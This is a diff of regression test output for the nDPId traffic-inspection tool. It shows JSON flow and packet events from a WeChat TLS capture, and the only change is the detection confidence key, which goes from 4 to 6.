00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167380894,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701DDsQ6LRVfOJaASN8i7gwAAAgQFoAQCCApFrVm2ADDU3wEDAwc="} 
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167380894,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0GvxAAEAG+kjAqAFny82XotNQAbtFV84lw7EOjIAQAOUg0QAAAQEICgAw1S1FrVm2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":274,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167380581,"flow_last_seen":1492167380894,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167380894,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
+01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":288,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167380581,"flow_last_seen":1492167381212,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167381212,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167382020,"flow_last_seen":1492167382020,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167382020,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1492167382020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167382020,"pkt":"8IQvSpdgeJKcD6iOCABFAAAokulAAEAGgjbAqAFny82X058kAbutvz98aYB+jlAQAdESKQAA"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1492167382374,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1492167382374,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoL8xAAC4G9rPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAQAIMTdgAAAADZK2u8"} 
-00646{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00646{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1492167353674,"flow_last_seen":1492167387855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1188,"flow_tot_l4_payload_len":11088,"flow_avg_l4_payload_len":346,"midstream":1,"thread_ts_msec":1492167387855,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1492167397120,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167397120,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePJAAEAGFx3AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO0gQAAAAQEICgAw5QaFnXDI"} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167400812,"flow_last_seen":1492167400812,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167400812,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":354,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1492167400812,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167400812,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8voBAAEAGVrzAqAFny82XotNRAbuSN1YhAAAAAKACchAKOQAAAgQFtAQCCAoAMOihAAAAAAEDAwc="} 
@@ -139,69 +139,69 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":355,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1492167401063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401063,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8\/z9AAEAGFf3AqAFny82XotNSAbu9GRfgAAAAAKACchAdWQAAAgQFtAQCCAoAMOjfAAAAAAEDAwc="} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401175,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701Ey6mUDkjdWIqASN8j5bgAAAgQFoAQCCApFrW16ADDooQEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1492167401175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401175,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0voFAAEAGVsPAqAFny82XotNRAbuSN1YiMuplBIAQAOVesAAAAQEICgAw6PtFrW16"} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":362,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167400812,"flow_last_seen":1492167401176,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167401176,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1492167401410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401410,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701JpITMTvRkX4aASN8iiggAAAgQFoAQCCApF0dMbADDo3wEDAwc="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1492167401410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401410,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/0BAAEAGFgTAqAFny82XotNSAbu9GRfhaSEzFIAQAOUHxwAAAQEICgAw6TZF0dMb"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1492167402013,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492167402013,"pkt":"eJKcD6iO8IQvSpdgCABFoABHL81AAC4G9pPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAYAIMZWAAAFQMDABoY8p0q0Neyx8LzFoDelCtviTdTs0pFnXUR7g=="} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167382020,"flow_last_seen":1492167402013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1492167402013,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 
-01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 
+00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1492167382020,"flow_last_seen":1492167402013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":10,"midstream":1,"thread_ts_msec":1492167402013,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": 